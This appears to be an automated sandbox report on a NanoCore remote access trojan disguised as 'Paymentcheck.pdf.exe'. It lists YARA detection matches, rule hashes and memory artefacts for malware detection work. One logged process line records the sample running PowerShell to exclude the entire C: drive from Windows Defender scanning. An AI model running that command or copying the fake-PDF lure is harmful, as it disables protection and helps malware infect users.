Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2857848.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2878134.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.2863ac4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Executable has a suspicious name (potential lure to open the executable)Show sources
Source: Paymentcheck.pdf.exeStatic file information: Suspicious name
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: Paymentcheck.pdf.exe
Source: initial sampleStatic PE information: Filename: Paymentcheck.pdf.exe
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_04F41AB00_2_04F41AB0
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_04F400400_2_04F40040
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_04F400260_2_04F40026
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0793C3D80_2_0793C3D8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A3DFE13_2_004A3DFE
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECE48013_2_00ECE480
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECE47113_2_00ECE471
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECBBD413_2_00ECBBD4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619E69013_2_0619E690
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619723013_2_06197230
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619807813_2_06198078
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619FB8813_2_0619FB88
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619F2A813_2_0619F2A8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619F36613_2_0619F366
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619813613_2_06198136
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A2A49013_2_06A2A490
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A2288013_2_06A22880
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A2B16813_2_06A2B168
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795A78814_2_0795A788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795036814_2_07950368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07950E4814_2_07950E48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795EC5014_2_0795EC50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795972814_2_07959728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795F6A814_2_0795F6A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795524814_2_07955248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0795B0C814_2_0795B0C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07951E8814_2_07951E88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07959EA014_2_07959EA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07957EA814_2_07957EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07955D2814_2_07955D28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DE4E814_2_079DE4E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D871014_2_079D8710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D000614_2_079D0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D8F4014_2_079D8F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D0E5B14_2_079D0E5B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D1D8814_2_079D1D88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DADF814_2_079DADF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D4D1014_2_079D4D10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D1D7814_2_079D1D78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DAB4814_2_079DAB48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079D59F114_2_079D59F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_079DC14914_2_079DC149
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 18_2_00993DFE18_2_00993DFE
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00E63DFE22_2_00E63DFE
Source: Paymentcheck.pdf.exeBinary or memory string: OriginalFilename vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.847261038.0000000007460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.849443394.0000000007700000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUyjtdycwlsevroaajvlbkd.dll" vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.850489798.0000000007BA0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.851147674.0000000007C90000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.851147674.0000000007C90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paymentcheck.pdf.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dllJump to behavior
Source: Paymentcheck.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
